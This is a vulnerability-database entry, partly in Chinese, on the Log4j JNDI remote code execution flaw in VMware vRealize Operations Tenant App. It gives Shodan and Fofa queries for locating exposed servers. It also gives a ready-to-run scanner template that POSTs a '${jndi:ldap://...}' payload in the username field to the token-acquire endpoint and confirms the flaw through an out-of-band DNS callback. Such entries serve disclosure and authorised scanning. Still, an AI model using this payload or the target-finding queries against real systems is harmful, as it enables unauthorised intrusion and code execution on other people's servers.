vrealize-operations-log4j-rce: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution

日期: 2025-09-01 | 影响软件: VMware vRealize Operations | POC: 已公开

漏洞描述

VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. Shodan: http.title:"vRealize Operations Tenant App" Fofa: title="vRealize Operations Tenant App"

PoC代码[已公开]

id: vrealize-operations-log4j-rce

info:
  name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
  author: bughuntersurya, NLEG
  severity: critical
  verified: true
  description: |
    VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
    Shodan: http.title:"vRealize Operations Tenant App"
    Fofa: title="vRealize Operations Tenant App"
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
    - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45046
  tags: vmware,log4j,rce,jndi
  created: 2023/07/02

set:
  rooturl: request.url
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /suite-api/api/auth/token/acquire
      headers:
        Content-Type: application/json
        Origin: "{{rooturl}}"
        Referer: "{{rooturl}}/ui/"
      body: |
        {"username":"${jndi:ldap://{{oobDNS}}}","password":"admin"}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()

相关漏洞推荐